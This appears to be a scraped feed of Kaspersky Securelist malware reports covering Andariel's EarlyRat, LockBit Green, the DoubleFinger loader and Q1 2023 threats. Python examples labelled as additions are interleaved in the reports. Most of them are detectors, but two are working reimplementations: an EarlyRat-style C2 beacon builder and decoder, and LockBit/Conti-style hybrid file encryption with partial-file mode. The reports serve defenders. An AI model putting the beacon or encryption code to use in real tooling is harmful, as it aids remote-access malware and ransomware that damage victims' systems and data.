Malware reports – Securelist
https://securelist.com

Andariel’s silly mistakes and a new malware family
https://securelist.com/lazarus-andariel-mistakes-and-easyrat/110119/
Wed, 28 Jun 2023 10:00:24 +0000

Introduction

Andariel, a part of the notorious Lazarus group, is known for its use of the DTrack malware and Maui ransomware in mid-2022. During the same period, Andariel also actively exploited the Log4j vulnerability as reported by Talos and Ahnlab. Their campaign introduced several new malware families, such as YamaBot and MagicRat, but also updated versions of NukeSped and, of course, DTrack.

While on an unrelated investigation recently, we stumbled upon this campaign and decided to dig a little bit deeper. We discovered a previously undocumented malware family and an addition to Andariel’s set of TTPs.

From initial infection to fat fingers

Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the C2 server. Unfortunately, we were unable to catch the first piece of malware they downloaded, but we did see that exploitation was closely followed by the DTrack backdoor being downloaded.

From this point on, things got rather interesting, as we were able to reproduce the commands the attackers executed. It quickly became clear that the commands were run by a human operator, and judging by the number of mistakes and typos, likely an inexperienced one. For example:

Note how “Program” is misspelled as “Prorgam”. Another funny moment was when the operators realized they were in a system that used the Portuguese locale. This took surprisingly long: they only learned after executing cmd.exe /c net localgroup, as you can see below:

We were also able to identify the set of off-the-shelf tools that Andariel installed and ran during the command execution phase, and then used for further exploitation of the target. Below are some examples:

  • Supremo remote desktop;
  • 3Proxy;
  • Powerline;
  • Putty;
  • Dumpert;
  • NTDSDumpEx;
  • ForkDump;
  • And more which can be found in our private report.

Meet EarlyRat

We first noticed a version of EarlyRat in one of the aforementioned Log4j cases and assumed it was downloaded via Log4j. However, when we started hunting for more samples, we found phishing documents that ultimately dropped EarlyRat. The phishing document itself is not that advanced, as can be seen below:

Once macros are enabled, the following command is executed:

Oddly enough, the VBA code pings a server associated with the HolyGhost / Maui ransomware campaign.

EarlyRat, just like many other RATs (remote access Trojans), collects system information upon starting and sends it to the C2 using the following template:

As can be seen above, there are two different parameters in the request: “id” and “query”. Next to those, the “rep0” and “page” parameters are also supported. They are used in the following cases:

  • id: unique ID of the machine used as a cryptographic key to decrypt value from “query”
  • query: the actual content. It is Base64 encoded and rolling XORed with the key specified in the “id” field.
  • rep0: the value of the current directory
  • page: the value of the internal state
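The request format above, as an added example that is not part of the original report: a small encoder/decoder for the four documented parameters. The report does not spell out the XOR schedule, so the code assumes “rolling XOR” means repeating-key XOR with the id string as the key; the C2 host, path and sample values are constructed for the example.

```python
"""Decoder for an EarlyRat-style C2 request (added example, not code from the report).

The report says "query" is Base64 encoded and "rolling XORed" with the key carried
in "id". The exact XOR schedule is not published, so this assumes the usual meaning:
repeating-key XOR, key bytes cycled over the data. The URL, path and sample
contents below are constructed for the example, not captured traffic.
"""
import base64
from urllib.parse import parse_qs, quote, urlsplit


def rolling_xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (assumed meaning of 'rolling XOR'); symmetric."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_query(plaintext: bytes, machine_id: str) -> str:
    return base64.b64encode(rolling_xor(plaintext, machine_id.encode())).decode()


def decode_query(encoded: str, machine_id: str) -> bytes:
    return rolling_xor(base64.b64decode(encoded), machine_id.encode())


def build_c2_url(host: str, machine_id: str, plaintext: bytes, cwd: str, state: str) -> str:
    """Assemble a beacon the way the four documented parameters are laid out."""
    params = {
        "id": machine_id,
        "query": encode_query(plaintext, machine_id),
        "rep0": cwd,    # current directory
        "page": state,  # internal state
    }
    # Base64 contains '+', '/' and '=', so every value is percent-encoded.
    return host + "?" + "&".join(f"{k}={quote(v, safe='')}" for k, v in params.items())


def parse_c2_request(url: str) -> dict:
    """Pull id/query/rep0/page out of a beacon URL and recover the plaintext."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    machine_id = qs["id"][0]
    return {
        "id": machine_id,
        "plaintext": decode_query(qs["query"][0], machine_id),
        "cwd": qs.get("rep0", [None])[0],
        "state": qs.get("page", [None])[0],
    }


# Constructed sample: host name and collected values are made up for the example.
SAMPLE_ID = "A1B2C3D4"
SAMPLE_PLAINTEXT = b"hostname=WS01;user=jdoe;os=Windows 10"
SAMPLE_URL = build_c2_url("http://c2.example.invalid/index.php", SAMPLE_ID,
                          SAMPLE_PLAINTEXT, r"C:\Users\jdoe", "0")

if __name__ == "__main__":
    print(SAMPLE_URL)
    print(parse_c2_request(SAMPLE_URL))
```

Because the key travels in the same request as the ciphertext, anyone holding a capture can recover the content: the scheme hides the beacon from casual inspection, not from analysis.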

In terms of functionality, EarlyRat is very simple. It is capable of executing commands, and that is about the most interesting thing it can do. There are a number of high-level similarities between EarlyRat and MagicRat. Both are written using a framework: Qt for MagicRat and PureBasic for EarlyRat. Also, the functionality of both RATs is very limited.

Conclusion

Despite being an APT group, Lazarus is known for performing typical cybercrime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated. Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware.

Focusing on TTPs as we did with Andariel helps to minimize attribution time and detect attacks in their early stages. This information can also help in taking proactive countermeasures to prevent incidents from happening.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals, or if you have questions about our private reports, reach out to us at crimewareintel@kaspersky.com.

LockBit Green and phishing that targets organizations
https://securelist.com/crimeware-report-lockbit-switchsymb/110068/
Thu, 22 Jun 2023 10:00:01 +0000

Introduction

In recent months, we published private reports on a broad range of subjects. We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these. If you have questions or need more information about our crimeware reporting service, contact crimewareintel@kaspersky.com.

Phishing and a kit

Recently we stumbled upon a Business Email Compromise (BEC) case, active since at least Q3 2022. The attackers target German-speaking companies in the DACH region. As in many other BEC cases, they register a domain name that is similar to that used by the attacked organization and typically differs in one or two letters. For reasons unknown, the Reply-to field contains a different email address from the From field. The Reply-to email address does not mimic the target-organization’s domain.
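One way to turn the two observations above into a mail-filter check, as an added example (not the report's code): flag a From domain within a small edit distance of the organization's own domain, and a Reply-To whose domain differs from From. The distance threshold of two and the sample message are assumptions constructed for the example.

```python
"""Detection heuristic for the BEC pattern described above (added example).

Two signals: a From domain that is one or two characters off the organization's
own domain, and a Reply-To whose domain differs from the From domain. The
threshold and the sample message below are assumptions/constructed, not taken
from the report.
"""
from email import message_from_string
from email.utils import parseaddr


def levenshtein(a: str, b: str) -> int:
    """Edit distance; small values between domains mean a lookalike."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value: str) -> str:
    addr = parseaddr(header_value or "")[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def bec_indicators(raw_message: str, org_domain: str, max_distance: int = 2) -> list:
    """Return human-readable findings for a raw RFC 5322 message."""
    msg = message_from_string(raw_message)
    from_dom = domain_of(msg.get("From"))
    reply_dom = domain_of(msg.get("Reply-To"))
    org = org_domain.lower()
    findings = []
    dist = levenshtein(from_dom, org)
    if from_dom and from_dom != org and dist <= max_distance:
        findings.append(f"lookalike sender domain {from_dom} (distance {dist} from {org})")
    if reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
    return findings


# Constructed sample: the real organization here is musterfirma.de; the sender
# swapped 'm' for 'rn' and points replies at an unrelated mailbox.
SAMPLE = """From: "Hans Mueller" <h.mueller@musterfirrna.de>
Reply-To: <accounting-desk@mail-service.example>
To: buchhaltung@musterfirma.de
Subject: Dringende Zahlung

Bitte Rechnung heute begleichen.
"""

if __name__ == "__main__":
    for line in bec_indicators(SAMPLE, "musterfirma.de"):
        print(line)
```

The Reply-To mismatch is the cheaper of the two checks and needs no brand list; the lookalike check needs the organization's own domains as input and will also fire on legitimate sister domains, so it is a scoring signal rather than a hard block.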

In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.

At the end of this past January, we observed a spike in phishing emails from a campaign targeting business users, which we have closely monitored. The messages contained a link to an “email confirmation form”. Anyone who clicked on the link found themselves on a page looking very similar to that of the recipient’s domain. The phishing kit was designed to serve multiple campaigns at a time while running as one instance on the web server. This was easily demonstrated by modifying the page URL, specifically the reference to the targeted user in it: the layout of the phishing page would change.

An example of a SwitchSymb-generated phishing page

LockBit Green

LockBit is one of the most prolific ransomware groups currently active, targeting businesses all over the world. Over time, they have adopted code from other ransomware gangs, such as BlackMatter and DarkSide, making it easier for potential affiliates to operate the ransomware.

Starting in this past February, we have detected a new variant, named “LockBit Green”, which borrows code from the now-defunct Conti gang. According to the Kaspersky Threat Attribution Engine (KTAE), LockBit incorporates 25% of Conti code.

KTAE shows similarities between LockBit Green and Conti

Three pieces of adopted code really stand out: the ransomware note, the command line options and the encryption scheme. Adopting the ransom note makes the least sense. We could not think of a good reason for doing so, but nevertheless, LockBit did it. In terms of command line options, the group added those from Conti to make them available in Lockbit. All the command line options available in Lockbit Green are:

Flag            Functionality
-p folder       Encrypt the selected folder using a single thread
-m local        Encrypt all available drives using multiple threads
-m net          Encrypt all network shares using multiple threads
-m all          Encrypt all available drives and network shares using multiple threads
-m backups      Not usable in the detected versions, but coded inside the ransomware
-size chunk     Encrypt only part of each file
-log file.log   Log every action performed by the ransomware
-nomutex        Skip mutex creation

Finally, LockBit adopted the encryption scheme from Conti. The group now uses a custom ChaCha8 implementation to encrypt files with a randomly generated key and nonce, which are stored encrypted with a hard-coded public RSA key.
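The scheme just described, and the “-size chunk” partial-encryption option from the table, as an added example in working code (not LockBit or Conti code): a per-file random ChaCha8 key and nonce, wrapped with an RSA public key and stored beside the ciphertext, with an option to encrypt only the first N bytes. Assumptions: the IETF ChaCha state layout (96-bit nonce, 32-bit counter), a toy textbook-RSA wrap on a runtime-generated 512-bit key (no padding; insecure, only to show the structure), and an invented container header.

```python
"""Hybrid file encryption in the shape the report describes for LockBit Green / Conti.
Added example, not LockBit or Conti code. Assumptions: IETF ChaCha layout (96-bit
nonce, 32-bit block counter); toy textbook RSA on a runtime-generated 512-bit key
(no padding; insecure, structure only); an invented container header.
"""
import math
import os
import random
import struct

MASK32 = 0xFFFFFFFF


def _rotl(v: int, n: int) -> int:
    return ((v << n) & MASK32) | (v >> (32 - n))


def _quarter_round(s: list, a: int, b: int, c: int, d: int) -> None:
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl(s[b] ^ s[c], 7)


def chacha_block(key: bytes, nonce: bytes, counter: int, rounds: int = 8) -> bytes:
    """One 64-byte keystream block; rounds=8 is ChaCha8, rounds=20 is ChaCha20."""
    state = (list(struct.unpack("<4I", b"expand 32-byte k")) + list(struct.unpack("<8I", key))
             + [counter & MASK32] + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(rounds // 2):  # one double round = column round + diagonal round
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(w[i] + state[i]) & MASK32 for i in range(16)])


def chacha_xor(key: bytes, nonce: bytes, data: bytes, rounds: int = 8) -> bytes:
    """Stream-cipher XOR; the same call encrypts and decrypts."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha_block(key, nonce, off // 64, rounds)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], ks))
    return bytes(out)


def _is_probable_prime(n: int, trials: int = 12) -> bool:
    if n < 2 or n % 2 == 0:
        return n == 2
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2; r += 1
    for _ in range(trials):  # Miller-Rabin
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def toy_rsa_keypair(bits: int = 512):
    """Toy RSA: returns public (e, n) and private (d, n). Demo only, never for real use."""
    def prime(b):
        while True:
            c = random.getrandbits(b) | (1 << (b - 1)) | 1
            if _is_probable_prime(c):
                return c
    e = 65537
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return (e, p * q), (pow(e, -1, phi), p * q)


def rsa_wrap(material: bytes, pub) -> bytes:
    e, n = pub  # textbook RSA, no padding: structure only
    return pow(int.from_bytes(material, "big"), e, n).to_bytes((n.bit_length() + 7) // 8, "big")


def rsa_unwrap(wrapped: bytes, priv, length: int) -> bytes:
    d, n = priv
    return pow(int.from_bytes(wrapped, "big"), d, n).to_bytes(length, "big")


def encrypt_blob(plaintext: bytes, pub, chunk: int = None) -> bytes:
    """chunk=None encrypts everything; chunk=N encrypts only the first N bytes ('-size')."""
    key, nonce = os.urandom(32), os.urandom(12)  # fresh per file
    n_enc = len(plaintext) if chunk is None else min(chunk, len(plaintext))
    wrapped = rsa_wrap(key + nonce, pub)
    header = struct.pack("<HI", len(wrapped), n_enc)  # invented container layout
    return header + wrapped + chacha_xor(key, nonce, plaintext[:n_enc]) + plaintext[n_enc:]


def decrypt_blob(blob: bytes, priv) -> bytes:
    wlen, n_enc = struct.unpack("<HI", blob[:6])
    material = rsa_unwrap(blob[6:6 + wlen], priv, 44)
    key, nonce = material[:32], material[32:]
    body = blob[6 + wlen:]
    return chacha_xor(key, nonce, body[:n_enc]) + body[n_enc:]
```

The point of the layout is that only the holder of the RSA private key can recover the per-file key, and the partial mode trades completeness for speed: with -size only the head of each file is encrypted and the tail stays in the clear, which is worth remembering when assessing what data an affected host actually exposed.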

Binary diffing across the two families

Multi-platform LockBit

We recently stumbled on a ZIP file, uploaded to a multiscanner, that contained LockBit samples for multiple architectures, such as Apple M1, ARM v6, ARM v7, FreeBSD and many others. The next question would obviously be, “What about codebase similarity?”.

For this, we used the KTAE: simply throwing in the downloaded ZIP file was enough to see that all the samples were derived from the LockBit Linux/ESXi version, which we wrote about in an earlier private report.

Source code shared with LockBit Linux

Further analysis of the samples led us to believe that LockBit were in the process of testing their ransomware on various architectures, instead of deploying it in the wild. For instance, the macOS sample was unsigned, so it could not be executed as is. Also, the string encryption method was simple: one byte XOR.

Nevertheless, our findings suggest that LockBit will target more platforms in the wild in the (near) future.

Conclusion

The world of cybercrime is huge, consisting of many players and gangs that are fluid in terms of composition. Groups adopt other groups’ code, and affiliates — which can be considered cybercrime groups in their own right — switch between different types of malware. Groups work on upgrades to their malware, adding features and providing support for multiple, previously unsupported, platforms, a trend that has existed for some time now.

When an incident occurs, it is important to find out who has targeted you. This helps to limit the scope of incident response and could help to prevent further damage. The KTAE attributes code to cybercrime groups and highlights features shared by different malware families. This information can also help in taking proactive countermeasures to prevent incidents from happening in the future.

Finally, criminals often resort to old tricks, such as phishing, which, nevertheless, remain highly effective. Being aware of the latest trends can prevent threats like BEC from materializing.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals or have questions about our private reports, contact crimewareintel@kaspersky.com.

Sneaky DoubleFinger loads GreetingGhoul targeting your cryptocurrency
https://securelist.com/doublefinger-loader-delivering-greetingghoul-cryptocurrency-stealer/109982/
Mon, 12 Jun 2023 10:00:57 +0000

Introduction

Stealing cryptocurrencies is nothing new. For example, the Mt. Gox exchange was robbed of many bitcoins back in the early 2010s. Attackers such as those behind the Coinvault ransomware were after your Bitcoin wallets, too. Since then, stealing cryptocurrencies has continued to occupy cybercriminals.

One of the latest additions to this phenomenon is the multi-stage DoubleFinger loader delivering a cryptocurrency stealer. DoubleFinger is deployed on the target machine when the victim opens a malicious PIF attachment in an email message, which ultimately executes the first of DoubleFinger’s loader stages.

DoubleFinger stage 1

The first stage is a modified “espexe.exe” (MS Windows Economical Service Provider Application) binary, in which DialogFunc is patched so that malicious shellcode is executed. After resolving API functions by hash (the resolver code was added to DialogFunc), the shellcode downloads a PNG image from Imgur.com. Next, the shellcode searches the downloaded image for the magic bytes (0xea79a5c6) to locate the encrypted payload embedded within it.

Real DialogFunc function (left) and patched function with shellcode (right)

The encrypted payload consists of:

  1. A PNG with the fourth-stage payload;
  2. An encrypted data blob;
  3. A legitimate java.exe binary, used for DLL sideloading;
  4. The DoubleFinger stage 2 loader.

DoubleFinger stage 2

The second stage is loaded by executing the legitimate Java binary, which sideloads the stage 2 loader located in the same directory (the file is named msvcr100.dll). Just like the first stage, this file is a legitimate binary that has been patched, with a structure and functionality similar to those of the first stage.

To no one’s surprise, the shellcode loads, decrypts and executes the third stage shellcode.

DoubleFinger stage 3

The third-stage shellcode differs greatly from the first and second stages. For example, it uses low-level Windows API calls, and ntdll.dll is loaded and mapped in the process memory to bypass hooks set by security solutions.

The next step is to decrypt and execute the fourth-stage payload, located in the aforementioned PNG file. Unlike the downloaded PNG file, which does not display a valid image, this PNG file does. The steganography method used is, however, rather simple, as the data is retrieved from specific offsets.

The aa.png file with embedded Stage 4

DoubleFinger stage 4

The stage 4 shellcode is rather simple. It locates the fifth stage within itself and then uses the Process Doppelgänging technique to execute it.

DoubleFinger stage 5

The fifth stage creates a scheduled task that executes the GreetingGhoul stealer every day at a specific time. It then downloads another PNG file (which is actually the encrypted GreetingGhoul binary prepended with a valid PNG header), decrypts it and then executes it.
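The three PNG tricks described above (stage 1: a marker 0xea79a5c6 inside an image that does not render; stage 4: data at fixed offsets inside an image that does; stage 5: an encrypted binary with a valid PNG header in front of it), as one added example of how an analyst carves them out (not the loader's own code). The byte order of the marker is not stated in the report, so both are tried; the sample images are constructed in memory.

```python
"""Carving DoubleFinger-style payloads out of PNG containers (added example; not
the loader's own code). The marker's byte order is an assumption (both orders are
tried) and the sample images below are constructed for the example.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MARKER = 0xEA79A5C6


def png_chunks(blob: bytes):
    """Walk PNG chunks; yield (type, data, crc_ok, end_offset). Stops at IEND or on damage."""
    if not blob.startswith(PNG_SIG):
        return
    pos = len(PNG_SIG)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        data = blob[pos + 8:pos + 8 + length]
        crc_field = blob[pos + 8 + length:pos + 12 + length]
        if len(data) < length or len(crc_field) < 4:
            return
        crc_ok = struct.unpack(">I", crc_field)[0] == zlib.crc32(ctype + data) & 0xFFFFFFFF
        pos += 12 + length
        yield ctype, data, crc_ok, pos
        if ctype == b"IEND":
            return


def is_valid_png(blob: bytes) -> bool:
    """Valid signature, every CRC right, IHDR first and an IEND chunk reached."""
    types = []
    for ctype, _, crc_ok, _ in png_chunks(blob):
        if not crc_ok:
            return False
        types.append(ctype)
    return bool(types) and types[0] == b"IHDR" and types[-1] == b"IEND"


def find_marker(blob: bytes, marker: int = MARKER):
    """Offset just past the marker, trying little- then big-endian encoding."""
    for enc in (struct.pack("<I", marker), struct.pack(">I", marker)):
        idx = blob.find(enc)
        if idx != -1:
            return idx + 4
    return None


def carve_after_marker(blob: bytes) -> bytes:
    """Stage 1 case: everything following the magic bytes."""
    start = find_marker(blob)
    return b"" if start is None else blob[start:]


def carve_after_iend(blob: bytes) -> bytes:
    """Stage 5 case: data trailing a complete PNG (valid header prepended to a payload)."""
    for ctype, _, _, end in png_chunks(blob):
        if ctype == b"IEND":
            return blob[end:]
    return b""


def carve_at_offset(blob: bytes, offset: int, length: int) -> bytes:
    """Stage 4 case: fixed-offset retrieval from an image that still renders."""
    return blob[offset:offset + length]


def _chunk(ctype: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_sample_png(trailer: bytes = b"") -> bytes:
    """Constructed 1x1 grayscale PNG; 'trailer' is appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, type, ...
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


# Constructed samples
PAYLOAD = b"ENCRYPTED-STAGE-DATA"
STAGE1_IMAGE = PNG_SIG + b"junk" * 8 + struct.pack("<I", MARKER) + PAYLOAD  # not a real PNG
STAGE5_IMAGE = make_sample_png(trailer=PAYLOAD)                               # renders fine

if __name__ == "__main__":
    print("stage1 valid PNG:", is_valid_png(STAGE1_IMAGE), "payload:", carve_after_marker(STAGE1_IMAGE))
    print("stage5 valid PNG:", is_valid_png(STAGE5_IMAGE), "payload:", carve_after_iend(STAGE5_IMAGE))
```

A practical triage consequence: an image that fails `is_valid_png` but is served from an image host is itself a signal, while a valid image with bytes after IEND is the quieter case and needs the chunk walk to notice.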

GreetingGhoul & Remcos

GreetingGhoul is a stealer designed to steal cryptocurrency-related credentials. It essentially consists of two major components that work together:

  1. A component that uses MS WebView2 to create overlays on cryptocurrency wallet interfaces;
  2. A component that detects cryptocurrency wallet apps and steals sensitive information (e.g. recovery phrases).

Examples of fake windows

With hardware wallets, a user should never enter their recovery seed on the computer. A hardware wallet vendor will never ask for that.

Next to GreetingGhoul we also found several DoubleFinger samples that downloaded the Remcos RAT. Remcos is a well-known commercial RAT often used by cybercriminals. We’ve seen it being utilized in targeted attacks against businesses and organizations.

Victims & Attribution

We found several pieces of Russian text in the malware. The first part of the C2 URL is “Privetsvoyu” which is a misspelled transliteration of the Russian word for “Greetings.” Secondly, we found the string “salamvsembratyamyazadehayustutlokeretodlyagadovveubilinashusferu.” Despite the weird transliteration, it roughly translates to: “Greetings to all brothers, I’m suffocating here, locker is for bastards, you’ve messed up our area of interest.”

Looking at the victims, we see them in Europe, the USA and Latin America. This is in line with the old adage that cybercriminals from CIS countries don’t attack Russian citizens. That said, the pieces of Russian text and the victimology are not enough to conclude that the ones behind this campaign are indeed from the post-Soviet space.

Conclusion

Our analysis of the DoubleFinger loader and GreetingGhoul malware reveals a high level of sophistication and skill in crimeware development, akin to advanced persistent threats (APTs). The multi-staged, shellcode-style loader with steganographic capabilities, the use of Windows COM interfaces for stealthy execution, and the implementation of Process Doppelgänging for injection into remote processes all point to well-crafted and complex crimeware. The use of Microsoft WebView2 runtime to create counterfeit interfaces of cryptocurrency wallets further underscores the advanced techniques employed by the malware.

To protect yourself against these threats, intelligence reports can help. If you want to stay up to date on the latest TTPs used by criminals, or have questions about our private reports, please contact crimewareintel@kaspersky.com.

Indicators of compromise

DoubleFinger
a500d9518bfe0b0d1c7f77343cac68d8
dbd0cf87c085150eb0e4a40539390a9a
56acd988653c0e7c4a5f1302e6c3b1c0
16203abd150a709c0629a366393994ea
d9130cb36f23edf90848ffd73bd4e0e0

GreetingGhoul
642f192372a4bd4fb3bfa5bae4f8644c
a9a5f529bf530d0425e6f04cbe508f1e

C2
cryptohedgefund[.]us

IT threat evolution Q1 2023
https://securelist.com/it-threat-evolution-q1-2023/109838/
Wed, 07 Jun 2023 08:00:34 +0000

Targeted attacks

BlueNoroff introduces new methods bypassing MotW

At the close of 2022, we reported the recent activities of BlueNoroff, a financially motivated threat actor known for stealing cryptocurrency. The threat actor typically exploits Word documents, using shortcut files for the initial intrusion. However, recently the group has adopted new methods to deliver its malware.

One of these, designed to evade the Mark-of-the-Web (MotW) flag, is the use of .ISO (optical disk image) and .VHD (virtual hard disk) file formats. MotW is a Windows security measure — the system displays a warning message when someone tries to open a file downloaded from the internet.

The threat actor also seems to be experimenting with new file types to deliver its malware. We observed a new Visual Basic script, a previously unseen Windows Batch file and a Windows executable.

Novel infection chain

Our analysis revealed more than 70 domains used by this group, meaning that they were very active until recently. They also created numerous fake domains that look like venture capital and bank domains: most of these imitate Japanese venture capital companies, indicating that the group has an extensive interest in Japanese financial entities.

Roaming Mantis implements new DNS changer

We continue to track the activities of Roaming Mantis (aka Shaoye), a well-established threat actor targeting countries in Asia. From 2019 to 2022, this threat actor mainly used ‘smishing’ to deliver a link to its landing page, with the aim of controlling infected Android devices and stealing device information, including user credentials.

However, in September 2022, we analyzed the new Wroba.o Android malware, used by Roaming Mantis, and discovered a DNS changer function that was implemented to target specific Wi-Fi routers used mainly in South Korea.

Infection flow with DNS hijacking

This can be used to manage all communications from devices using a compromised Wi-Fi router with the rogue DNS settings — for example, to redirect someone to malicious hosts and interfere with security product updates. People connect infected Android devices to free, public Wi-Fi in such places as cafes, bars, libraries, hotels, shopping malls, and airports. When connected to a targeted Wi-Fi model with vulnerable settings, the malware will compromise the router and affect other devices as well. As a result, it can spread widely in the targeted regions.

Since the start of the Russo-Ukrainian conflict, we have identified a significant number of geo-political cyber-attacks, as outlined in our overview of the cyber-attacks related to the conflict.

Last October, we identified an active infection of government, agriculture and transportation organizations located in Donetsk, Lugansk and Crimea. The initial vector of compromise is unclear, but the details of the next stage imply the use of spear-phishing or something similar. The targets navigated to a URL pointing to a ZIP archive hosted on a malicious web server. This archive contained two files: a decoy document (we discovered PDF, XLSX and DOCX versions) and a malicious LNK file with a double extension (e.g. PDF.LNK) which, when opened, results in infection.
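A triage check for the delivery archive just described, as an added example (not the campaign's tooling): scan a ZIP for members whose name ends in a document extension followed by .LNK, and for members that carry the Windows shortcut header regardless of their name. The archive is constructed in memory; the header check uses the documented LNK HeaderSize (0x4C) and ShellLink CLSID.

```python
"""Triage check for a ZIP holding a decoy document and a double-extension LNK
(added example, not the campaign's tooling). Members are flagged by name and by
the LNK file header (HeaderSize 0x4C followed by the ShellLink CLSID
00021401-0000-0000-C000-000000000046), so a renamed shortcut is still caught.
The archive built below is constructed for the example.
"""
import io
import zipfile

LNK_HEADER = (b"\x4c\x00\x00\x00"                                   # HeaderSize = 0x4C
              b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")  # CLSID
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def member_findings(name: str, head: bytes) -> list:
    """Findings for one archive member given its name and first bytes."""
    parts = name.lower().rsplit("/", 1)[-1].split(".")
    findings = []
    if len(parts) >= 3 and parts[-1] == "lnk" and "." + parts[-2] in DOC_EXTS:
        findings.append("double extension masquerading as a document")
    if head.startswith(LNK_HEADER):
        if parts[-1] != "lnk":
            findings.append("LNK header with non-.lnk extension")
        else:
            findings.append("Windows shortcut")
    return findings


def scan_archive(zip_bytes: bytes) -> dict:
    """Map member name -> findings for every member that needs attention."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_HEADER))
            found = member_findings(info.filename, head)
            if found:
                report[info.filename] = found
    return report


def build_sample_archive() -> bytes:
    """Constructed ZIP: decoy PDF, a double-extension LNK, and a renamed LNK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Results.pdf", b"%PDF-1.4 decoy")
        zf.writestr("Results.pdf.lnk", LNK_HEADER + b"\x00" * 40)
        zf.writestr("notes.txt", LNK_HEADER + b"\x00" * 40)
    return buf.getvalue()


if __name__ == "__main__":
    for name, found in scan_archive(build_sample_archive()).items():
        print(name, "->", "; ".join(found))
```

Explorer hides known extensions by default, which is exactly why “Results.pdf.lnk” displays as “Results.pdf”; the header check matters because the same trick works with any extension the attacker prefers.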

Decoy Word document (subject: Results of the State Duma elections in the Republic of Crimea)

In several cases, the contents of the decoy document were directly related to the name of the malicious LNK, to trick the user into activating it

The LNK file downloads and installs a PowerShell backdoor called “PowerMagic”, which in turn deploys a sophisticated modular framework called “CommonMagic”. We discovered CommonMagic plugins capable of stealing files from USB devices as well as taking screenshots and sending them to the threat actor.

Infection chain

During our initial analysis, we were unable to find anything to connect the samples we found and the data used in the campaign to any previously known threat actor. However, our continuing investigations revealed more information about this threat, including links to other APT campaigns. You can find the details here.

Other malware

Prilex targets contactless credit card transactions

Prilex has evolved from ATM-focused malware into the most advanced PoS threat we have seen so far. The threat actor goes beyond the old memory scrapers seen in PoS attacks, to highly advanced malware that includes a unique cryptographic scheme, real-time patching of target software, forcing protocol downgrades, manipulating cryptograms, performing so-called “GHOST transactions” and credit card fraud — even on chip-and-PIN cards.

While investigating an incident, we discovered new Prilex samples, and one of the new features included the ability to block contactless transactions. These transactions generate a unique identifier that’s valid for just one transaction, making them worthless to cybercriminals. By blocking the transaction, Prilex tries to force the customer to insert their card to make a chip-and-PIN transaction instead, allowing the cybercriminals to capture data from the card using their standard techniques.

With contactless card transactions increasing, this is a valuable technique that allows the Prilex threat actor to continue stealing card information.

The threat actor uses social engineering to infect a PoS terminal. They try to convince employees of a retail outlet that they urgently need to update the terminal’s software and to allow a “technical specialist” to visit the store, or at least provide remote access to the terminal. It’s important that retail organizations are alert to the signs of infection — including repeated failed contactless transactions — and educate staff about the methods used by cybercriminals to gain entry to their systems.

For retail companies (especially large networks with many branches), it’s important to develop internal regulations and explain to all employees exactly how technical support and/or maintenance crews should operate. This should at least prevent unauthorized access to POS terminals. In addition, increasing employees’ awareness of the latest cyberthreats is always a good idea: that way they’ll be much less susceptible to new social engineering tricks.

Stealing cryptocurrency using a fake Tor browser

